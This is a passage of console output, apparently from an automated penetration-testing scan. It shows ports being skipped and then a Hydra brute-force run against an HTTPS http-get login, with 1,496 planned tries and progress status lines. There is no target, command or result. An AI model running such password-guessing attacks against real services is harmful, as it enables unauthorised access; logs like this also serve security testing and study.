1398. + -- --=[Port 162 closed... skipping.
1399. + -- --=[Port 389 closed... skipping.
1400. + -- --=[Port 443 opened... running tests...
1401. Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1402.  
1403. Hydra (http://www.thc.org/thc-hydra) starting at 2017-07-14 17:50:15
1404. [DATA] max 1 task per 1 server, overall 64 tasks, 1496 login tries (l:34/p:44), ~23 tries per task
1405. [DATA] attacking service http-get on port 443 with SSL
1406. [STATUS] 26.00 tries/min, 26 tries in 00:01h, 1495 to do in 00:58h, 1 active
1407. [STATUS] 14.33 tries/min, 43 tries in 00:03h, 1495 to do in 01:45h, 1 active
1408. [STATUS] 9.00 tries/min, 63 tries in 00:07h, 1495 to do in 02:47h, 1 active
1409. [STATUS] 6.75 tries/min, 81 tries in 00:12h, 1495 to do in 03:42h, 1 active
1410. [STATUS] 8.65 tries/min, 147 tries in 00:17h, 1478 to do in 02:51h, 1 active
1411. r[STATUS] 7.36 tries/min, 162 tries in 00:22h, 1463 to do in 03:19h, 1 active